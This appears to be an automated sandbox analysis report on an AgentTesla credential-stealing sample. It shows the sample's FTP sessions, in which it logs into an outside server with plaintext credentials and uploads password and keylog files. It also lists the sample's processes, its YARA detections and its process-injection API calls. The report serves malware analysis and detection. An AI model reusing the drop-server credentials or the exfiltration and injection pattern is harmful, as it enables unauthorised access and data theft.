Jan 11, 2025 01:15:35.373526096 CET	21	49718	213.189.52.181	192.168.2.11	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 01:15:35.373754025 CET	49718	21	192.168.2.11	213.189.52.181	USER f2241_evico
Jan 11, 2025 01:15:35.567496061 CET	21	49718	213.189.52.181	192.168.2.11	331 User f2241_evico OK. Password required
Jan 11, 2025 01:15:35.567634106 CET	49718	21	192.168.2.11	213.189.52.181	PASS Doll650#@
Jan 11, 2025 01:15:35.863121986 CET	21	49718	213.189.52.181	192.168.2.11	230 OK. Current restricted directory is /
Jan 11, 2025 01:15:36.057035923 CET	21	49718	213.189.52.181	192.168.2.11	504 Unknown command
Jan 11, 2025 01:15:36.057446957 CET	49718	21	192.168.2.11	213.189.52.181	PWD
Jan 11, 2025 01:15:36.251548052 CET	21	49718	213.189.52.181	192.168.2.11	257 "/" is your current location
Jan 11, 2025 01:15:36.251746893 CET	49718	21	192.168.2.11	213.189.52.181	TYPE I
Jan 11, 2025 01:15:36.445424080 CET	21	49718	213.189.52.181	192.168.2.11	200 TYPE is now 8-bit binary
Jan 11, 2025 01:15:36.447154045 CET	49718	21	192.168.2.11	213.189.52.181	PASV
Jan 11, 2025 01:15:36.640790939 CET	21	49718	213.189.52.181	192.168.2.11	227 Entering Passive Mode (213,189,52,181,250,74)
Jan 11, 2025 01:15:36.646307945 CET	49718	21	192.168.2.11	213.189.52.181	STOR PW_user-436432_2025_01_10_19_15_34.html
Jan 11, 2025 01:15:37.203043938 CET	21	49718	213.189.52.181	192.168.2.11	150 Accepted data connection
Jan 11, 2025 01:15:37.395586014 CET	21	49718	213.189.52.181	192.168.2.11	226-File successfully transferred 226-File successfully transferred226 0.192 seconds (measured here), 1.76 Kbytes per second
Jan 11, 2025 01:15:43.157371998 CET	21	49726	213.189.52.181	192.168.2.11	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 01:15:43.157576084 CET	49726	21	192.168.2.11	213.189.52.181	USER f2241_evico
Jan 11, 2025 01:15:43.353605986 CET	21	49726	213.189.52.181	192.168.2.11	331 User f2241_evico OK. Password required
Jan 11, 2025 01:15:43.353779078 CET	49726	21	192.168.2.11	213.189.52.181	PASS Doll650#@
Jan 11, 2025 01:15:43.627499104 CET	21	49726	213.189.52.181	192.168.2.11	230 OK. Current restricted directory is /
Jan 11, 2025 01:15:43.823437929 CET	21	49726	213.189.52.181	192.168.2.11	504 Unknown command
Jan 11, 2025 01:15:43.823604107 CET	49726	21	192.168.2.11	213.189.52.181	PWD
Jan 11, 2025 01:15:44.030733109 CET	21	49726	213.189.52.181	192.168.2.11	257 "/" is your current location
Jan 11, 2025 01:15:44.030894041 CET	49726	21	192.168.2.11	213.189.52.181	TYPE I
Jan 11, 2025 01:15:44.226789951 CET	21	49726	213.189.52.181	192.168.2.11	200 TYPE is now 8-bit binary
Jan 11, 2025 01:15:44.227814913 CET	49726	21	192.168.2.11	213.189.52.181	PASV
Jan 11, 2025 01:15:44.423666000 CET	21	49726	213.189.52.181	192.168.2.11	227 Entering Passive Mode (213,189,52,181,249,128)
Jan 11, 2025 01:15:44.430083036 CET	49726	21	192.168.2.11	213.189.52.181	STOR PW_user-436432_2025_01_10_19_15_42.html
Jan 11, 2025 01:15:44.990879059 CET	21	49726	213.189.52.181	192.168.2.11	150 Accepted data connection
Jan 11, 2025 01:15:45.185775995 CET	21	49726	213.189.52.181	192.168.2.11	226-File successfully transferred 226-File successfully transferred226 0.194 seconds (measured here), 1.74 Kbytes per second
Jan 11, 2025 01:16:55.793698072 CET	21	49917	213.189.52.181	192.168.2.11	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 01:16. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 01:16. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 01:16. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 01:16:55.793864965 CET	49917	21	192.168.2.11	213.189.52.181	USER f2241_evico
Jan 11, 2025 01:16:55.985843897 CET	21	49917	213.189.52.181	192.168.2.11	331 User f2241_evico OK. Password required
Jan 11, 2025 01:16:55.985969067 CET	49917	21	192.168.2.11	213.189.52.181	PASS Doll650#@
Jan 11, 2025 01:16:56.280817032 CET	21	49917	213.189.52.181	192.168.2.11	230 OK. Current restricted directory is /
Jan 11, 2025 01:16:56.474520922 CET	21	49917	213.189.52.181	192.168.2.11	504 Unknown command
Jan 11, 2025 01:16:56.474668026 CET	49917	21	192.168.2.11	213.189.52.181	PWD
Jan 11, 2025 01:16:56.667603970 CET	21	49917	213.189.52.181	192.168.2.11	257 "/" is your current location
Jan 11, 2025 01:16:56.669245005 CET	49917	21	192.168.2.11	213.189.52.181	TYPE I
Jan 11, 2025 01:16:56.861061096 CET	21	49917	213.189.52.181	192.168.2.11	200 TYPE is now 8-bit binary
Jan 11, 2025 01:16:56.861447096 CET	49917	21	192.168.2.11	213.189.52.181	PASV
Jan 11, 2025 01:16:57.053361893 CET	21	49917	213.189.52.181	192.168.2.11	227 Entering Passive Mode (213,189,52,181,249,154)
Jan 11, 2025 01:16:57.059230089 CET	49917	21	192.168.2.11	213.189.52.181	STOR KL_user-436432_2025_01_24_23_57_06.html
Jan 11, 2025 01:16:57.642431974 CET	21	49917	213.189.52.181	192.168.2.11	150 Accepted data connection
Jan 11, 2025 01:16:57.836504936 CET	21	49917	213.189.52.181	192.168.2.11	226-File successfully transferred 226-File successfully transferred226 0.192 seconds (measured here), 1.43 Kbytes per second

Target ID:	1
Start time:	19:15:19
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\ukBQ4ch2nE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ukBQ4ch2nE.exe"
Imagebase:	0xef0000
File size:	985'600 bytes
MD5 hash:	74421477FAFAF6BEB9D8E3806E1F6643
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:15:19
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\ukBQ4ch2nE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ukBQ4ch2nE.exe"
Imagebase:	0x550000
File size:	985'600 bytes
MD5 hash:	74421477FAFAF6BEB9D8E3806E1F6643
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	19:15:32
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xc00000
File size:	985'600 bytes
MD5 hash:	74421477FAFAF6BEB9D8E3806E1F6643
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:15:32
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0xa90000
File size:	985'600 bytes
MD5 hash:	74421477FAFAF6BEB9D8E3806E1F6643
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:15:40
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x530000
File size:	985'600 bytes
MD5 hash:	74421477FAFAF6BEB9D8E3806E1F6643
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:15:40
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x750000
File size:	985'600 bytes
MD5 hash:	74421477FAFAF6BEB9D8E3806E1F6643
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.1%
Total number of Nodes:	197
Total number of Limit Nodes:	13

Executed Functions

Function 05879330 Relevance: 3.1, APIs: 2, Instructions: 106
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058792E6
WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 058793C8

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: AllocMemoryProcessVirtualWrite
String ID:
API String ID: 645232735-0
Opcode ID: 9f7131f9384454bf61ff876b617460a62f0f41998a36113882c68f08747a8834
Instruction ID: 8ff53eb1b80975e2b11dad423ad937403fa9512b6d49e3ab883298c8866df85a
Opcode Fuzzy Hash: 9f7131f9384454bf61ff876b617460a62f0f41998a36113882c68f08747a8834
Instruction Fuzzy Hash: 3F41787290024D9FDF10DFAAC844BEEBBF5FF48320F108829E919A7250D7799954CBA0

Function 05879198 Relevance: 3.1, APIs: 2, Instructions: 101
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 05879152
Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0587921E

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: Thread$ContextResumeWow64
String ID:
API String ID: 1826235168-0
Opcode ID: c214e2287f078abe92b673af0c1d77ccde58366c1808f7cd74cb8738a9d8e208
Instruction ID: ee358069b18411524c561e98bfd9c4664ff2126aa89f105a39a1f1287db4628b
Opcode Fuzzy Hash: c214e2287f078abe92b673af0c1d77ccde58366c1808f7cd74cb8738a9d8e208
Instruction Fuzzy Hash: 68415971D002098FDB10DFAAC8857AEBBF5EF98324F14842AD569E7240DB789945CFA0

Function 05879270 Relevance: 3.1, APIs: 2, Instructions: 91
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0587921E
VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058792E6

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: AllocContextThreadVirtualWow64
String ID:
API String ID: 2727713192-0
Opcode ID: 54eed401e38244253325386584526c95215d77b3f82930feefdd60accf5597e0
Instruction ID: 9590fe8ac02179023d491220fb4d8c1104e01644f5ba993b3f4e032be54c6b85
Opcode Fuzzy Hash: 54eed401e38244253325386584526c95215d77b3f82930feefdd60accf5597e0
Instruction Fuzzy Hash: D1317872D002498FDB20DFAAC844BEFBBF5EF98324F148419D529A7250DB799944CFA1

Function 058795B4 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 058797F6

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9663d2c4b1f0265ece909112f505578286515e500928c5f4381fb45dfe096609
Instruction ID: 6ab83faf22fa4daa1f47db3edbaf7b946809d0664b3f3a990b261ddf94376b9d
Opcode Fuzzy Hash: 9663d2c4b1f0265ece909112f505578286515e500928c5f4381fb45dfe096609
Instruction Fuzzy Hash: 8FA14871D0425D9FEB20CFA8C881BEDBBB2BB48314F1581A9E819E7250DB749D85CF91

Function 058795C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 058797F6

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8681bc33418afd569dc4a820ac692f38b1437fb5bb1eb5957c34515b00c23f3b
Instruction ID: 3e4f4aee38ca9bba7d448505251f42a6d88c50367d603f6f2ea1af5349ace3c3
Opcode Fuzzy Hash: 8681bc33418afd569dc4a820ac692f38b1437fb5bb1eb5957c34515b00c23f3b
Instruction Fuzzy Hash: D4914871D0025D9FEB20CFA8C881BEDBBB2BB48314F1581A9E819E7250DB749D85CF91

Function 0316B0B0 Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0316B306

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f5997737ad19f2a15dddf31e2dc8aaab2fc88fd68a56d271869a30d0f53659c6
Instruction ID: eca74638a62fdda93a11ea4cad235d8ed90a3a6133aa6ccb67fe49b769e277f1
Opcode Fuzzy Hash: f5997737ad19f2a15dddf31e2dc8aaab2fc88fd68a56d271869a30d0f53659c6
Instruction Fuzzy Hash: AE7157B0A00B459FD724DFAAD54475ABBF1FF88300F04892DD04ADBA50DB74E856CB90

Function 0316590D Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031659C9

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c710cf894f6e6a20ffc69229f53b75908692799e55fbea86bbac1e075069baa5
Instruction ID: 02a46b06c4b5449a14ca3bd9ac2d6fac4eddaba07b6f8d0c1e4d6e176c488b14
Opcode Fuzzy Hash: c710cf894f6e6a20ffc69229f53b75908692799e55fbea86bbac1e075069baa5
Instruction Fuzzy Hash: 0141F2B0C00719CFDB24DFA9C884B9DBBF6BF49304F24816AD408AB251DB756946CF90

Function 05870BE4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05874381

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 7d6383efd81d686def44ccb3951c9ae3ec5bd9fc514b173e26445b26f5c9123f
Instruction ID: db6b231ad49a7308d55aa2177d5ac3bd11c1f48446f402e15e9abde23e87651c
Opcode Fuzzy Hash: 7d6383efd81d686def44ccb3951c9ae3ec5bd9fc514b173e26445b26f5c9123f
Instruction Fuzzy Hash: 354129B4900309CFCB14CF99C888EAABBF5FF88314F258559E519AB321D734E841CBA0

Function 03164248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031659C9

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5542dbf5d6f980f21ec0e58ae41749b5013486a35e9d4ab28feeec90994f2ebb
Instruction ID: c845c89f844f3637f36eeca623d8c05b28d6000ec62c1b804958881125f28f8e
Opcode Fuzzy Hash: 5542dbf5d6f980f21ec0e58ae41749b5013486a35e9d4ab28feeec90994f2ebb
Instruction Fuzzy Hash: 4841CFB0D0061DCFDB24CFAAC884B9EBBB6FF49304F24816AD408AB255DB756945DF90

Function 05879338 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 058793C8

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 05f9e947898045525ebbd3346667b1fd1449b937174d0ce2d276194f0191ea6e
Instruction ID: aded56f5fe672a668ca8e766e1a48bf1f0c68f19e08dd8e88eb42786268fa688
Opcode Fuzzy Hash: 05f9e947898045525ebbd3346667b1fd1449b937174d0ce2d276194f0191ea6e
Instruction Fuzzy Hash: DB21397190034D9FDB10CFAAC881BEEBBF5FF48320F108829E919A7240D7789944CBA4

Function 0316CE58 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0316D54E,?,?,?,?,?), ref: 0316D60F

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1069867c509c4aab25175c02559a890ffb12f57b249bbb25d8b6249ed6213658
Instruction ID: c0744664715d596c52ec21d0a2cee8869dd0206131cda7ea1f6f512e7920ac49
Opcode Fuzzy Hash: 1069867c509c4aab25175c02559a890ffb12f57b249bbb25d8b6249ed6213658
Instruction Fuzzy Hash: 0821E6B5900248EFDB10CF9AD984AEEFFF4EB48320F14841AE918A7310D374A950CFA5

Function 05879423 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 058794A8

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 24cbb944c12b12264b5180160c090712e74c9e2e1890178c556256c3674bfed5
Instruction ID: aaac81a5bbaa578b17dc7f0c57cc4592772409407aedeb9fd20db53a8a76406a
Opcode Fuzzy Hash: 24cbb944c12b12264b5180160c090712e74c9e2e1890178c556256c3674bfed5
Instruction Fuzzy Hash: DB2139B1C0024D9FDB10DFAAC881AEEFBF5FF48320F148429E919A7250D7799944DBA4

Function 05879428 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 058794A8

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f76eb70c9c8d61b9fff5a470b7ddd964fe9916ef091db0f2e6d956d8c0ba36df
Instruction ID: 5e393f3484dc415593e12cf39bd35e8cbcadf659a26632e7b34bc1e819bbe095
Opcode Fuzzy Hash: f76eb70c9c8d61b9fff5a470b7ddd964fe9916ef091db0f2e6d956d8c0ba36df
Instruction Fuzzy Hash: 292139B1C0024D9FDB10CFAAC840AEEFBF5FF48320F108429E919A7250D7799940DBA4

Function 058791A0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0587921E

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ff6f26cb5d48c920486ec22008a7b6d39efe9bfd3586f971e16e4feccefad471
Instruction ID: 64b502270c3b04f192001b5a12ee254dcbc992d8275ff61e4faccbb29541e82b
Opcode Fuzzy Hash: ff6f26cb5d48c920486ec22008a7b6d39efe9bfd3586f971e16e4feccefad471
Instruction Fuzzy Hash: FB214971D002098FDB10DFAAC485BEEBBF4FF48324F148429D459A7240DB789944CFA4

Function 0316D580 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0316D54E,?,?,?,?,?), ref: 0316D60F

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1c2062ffd85bcb9bfca5a413e8942e067b44f6dac30f6b408dd37d279551ba7b
Instruction ID: 476a476b8bf893ed48a1957d05f1cdfe1b150a9cd390e0199c9828c8f1726313
Opcode Fuzzy Hash: 1c2062ffd85bcb9bfca5a413e8942e067b44f6dac30f6b408dd37d279551ba7b
Instruction Fuzzy Hash: 2D21F3B5D00248DFDB10CF99E584ADEBBF4EB48320F14845AE818A7310D379AA50CF65

Function 05879278 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058792E6

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ee586d26a9a891083575f47019352c7c4e1904e38987953bc8275d3497d5613d
Instruction ID: 0a038671279ce3910b4cfa8b6965944beb63f41a52ec098406561e6c01c667bd
Opcode Fuzzy Hash: ee586d26a9a891083575f47019352c7c4e1904e38987953bc8275d3497d5613d
Instruction Fuzzy Hash: B51137719002499FDB10DFAAC844ADFBFF5EF88320F148819E529A7250DB759940CFA4

Function 058790EB Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05879152

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a69e247e4c6fd7bb766c130bad10294aab905e7e0c3984979662b48d02f44f1f
Instruction ID: e7aa6315bc305c61928737f5d9d77c86d3fbf603022996d9b8214a898e1e8620
Opcode Fuzzy Hash: a69e247e4c6fd7bb766c130bad10294aab905e7e0c3984979662b48d02f44f1f
Instruction Fuzzy Hash: 171128B1D002488FDB20DFAAC84579EFBF9EB98324F248419D519A7240DA79A944CBA4

Function 058790F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05879152

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 77276e62ab3dae9f3d483594268229a3868136f3d5c36fcbddf86b116a15dd82
Instruction ID: 0506d2a91add372ff9114e08d1eb62f52f628ac9efa770fd7abe307700bdf66a
